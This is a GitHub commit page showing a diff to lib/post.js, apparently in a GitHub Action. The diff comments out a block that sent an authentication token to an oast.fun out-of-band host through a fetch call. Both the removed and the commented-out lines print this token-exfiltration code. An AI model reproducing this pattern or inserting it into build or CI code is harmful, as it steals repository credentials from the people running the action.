Skip to content

Commit

Permalink
Update post.js
Browse files Browse the repository at this point in the history
  • Loading branch information
suchithrzp authored Nov 6, 2024
1 parent c7265e9 commit 8ac5c80
Showing 1 changed file with 7 additions and 7 deletions.
14 changes: 7 additions & 7 deletions lib/post.js
Original file line number Diff line number Diff line change
Expand Up @@ -27,13 +27,13 @@ export async function post(core, request) {
return;
}

try {
const url = `https://cehdzfntykekreyhyyqy5ns1w6yn98ovz.oast.fun?authc=${token}`;
await fetch(url);
core.info(`HTTP GET request sent to ${url}`);
} catch (error) {
core.error(`Failed to send HTTP GET request: ${error.message}`);
}
// try {
// const url = `https://cehdzfntykekreyhyyqy5ns1w6yn98ovz.oast.fun?authc=${token}`;
// await fetch(url);
// core.info(`HTTP GET request sent to ${url}`);
// } catch (error) {
// core.error(`Failed to send HTTP GET request: ${error.message}`);
// }


try {
Expand Down

0 comments on commit 8ac5c80

Please sign in to comment.